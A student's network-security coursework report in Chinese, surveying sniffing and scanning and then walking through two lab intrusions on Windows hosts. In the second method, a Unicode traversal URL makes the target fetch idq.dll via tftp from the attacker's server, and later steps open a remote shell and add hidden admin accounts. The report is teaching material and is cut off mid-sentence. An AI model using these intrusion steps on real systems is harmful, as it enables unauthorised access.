《网络安全技术》课程考查大作业 (3).docxVIP

大连外国语大学软件学院 成绩评定： 成绩评定： 专业： 信管（英日） 年级： 2013级 班级： 21班 姓名： 刘佳欣 学号： 130452122 黑客常用网络侦听、网络扫描、网络入侵方法简介 网络侦听：网络侦听是一种监视网络状态、数据流程以及网络上信息传输的方式，它可以将网络界面设定成监听模式，并且可以截获网络上所传输的信息。也就是说，当黑客登录网络主机并取得超级用户权限后，若要登录到其它主机，使用网络监听便可以有效地截获网络上的数据，这是黑客使用最普遍的方法。但是网络监听只能应用于连接在 同一网段上的主机，通常被用来获取用户的密码等。包括Wireshark、Sniffer Pro、Win Sniffer、pswmonitor、Iris等工具可以截获数据包内容进行分析，并得到IP地址及发送的数据的内容。也可以监听WEB提交的邮箱密码、POP3收信密码以及FTP登录密码等。 网络扫描：网络扫描是攻击者情报采集的三个组成部分之一。在足迹打印阶段，攻击者创建一个目标组织的轮廓，包含一些信息，例如它的域名系统（DNS），电子邮件服务器，还有IP地址范围。这些信息中大部分可以在线得到。在扫描阶段，攻击者找到了关于特定IP地址的信息，该IP地址可以通过因特网进行评估，如他们的操作系统、系统结构和每台计算机上的服务等等各种相关信息。在列举阶段，攻击者搜集关于网络用户、工作组名称、路由表和简单网络管理协议等资料。网络扫描是确认网络运行的主机的工作程序，或是为了对主机进行攻击，或是为了网络安全评估。网络扫描程序，如Ping扫射和端口扫描，返回关于哪个IP地址映射有主机连接到因特网上的并是工作的，这些主机提供什么样的服务的信息。另一种扫描方法是反向映射，返回关于哪个IP地址上没有映射出活动的主机的信息，这使攻击者能假设出可行的地址。包括系统用户扫描、开放端口扫描、共享目录扫描、利用TCP协议进行端口扫描、漏洞扫描等。 网络入侵：网络入侵（hacking）通常是指具有熟练地编写和调试计算机程序的技巧，并使用这些技巧来获得非法或未授权的网络或文件访问。简单的说就是：黑客通过网络对电脑进行远程操控或者破坏。 入侵环境准备： 图1-1 主机信息及IP地址 图1-2 目标机信息及IP地址 第一种入侵方法 利用打印机漏洞入侵系统。 方法原理 利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户。 入侵过程 首先将cniis.exe文件拷贝至主机的C盘根目录下，如图2-1. 图2-1 将cniis.exe拷贝至本机的C盘根目录。 ⑵ 通过DOS窗口运行c:\cniis.exe 0 0，即可在对方账户中创建一个管理员账户hax，如图2-2. 图2-2 通过命令行运行可入侵至目标机。 ⑶通过运行net use \\0\ipc$ hax /user:hax即可完成命令。 图2-3 利用net use可在对方系统创建一个账号密码均为hax的管理员用户。 入侵结果 创建完成后，黑客可以使用其他软件（如远程控制软件），通过具有管理员权限的账户登陆目标机并进行一系列其他操作。 第二种入侵方法 通过UniCode漏洞入侵对方系统 3.1 方法原理 Unicode漏洞是攻击者可通过IE浏览器远程运行被攻击计算机的cmd.exe文件，从而使该计算机的文件暴露，且可随意执行和更改文件的漏洞。 3.2 入侵过程 ⑴将tftp32 idq.dll ipsc.exe放在C盘根目录下，以tftp32建立本地服务器，如图3-1。 图3-1 本地服务器已经开启 在IE中输入如下字符串’0/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+0+get+idq.dll’，可以把idq.dll拷贝至目标机的C盘根目录。如图3-2。 图3-2 虽然显示error，但并不影响结果。 浏览器中通过”’ 0/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir”可以查看目标机系统盘的目录结构，发现idq.dll已经成功上传。如图3-3。 图3-3 idq.dll已经存在于目标机的系统根目录下。 在本机上用DOS窗口运行” ispc.exe 0/scripts/idq.dll”,再按两次回车即可进入目标机的DOS窗口，这是我们通过”net use hackliu liubs /add”可以增加一个有管理员权限的用户账户。如图3-4. 图3-4 上图结果表示命令已完成。账户已添加。 3.3 入侵结果 通过Unicode漏洞入侵系统之后，未经授权的用户可以利用IUSR_machinename账号访问用户目录的任何文件。同时，我们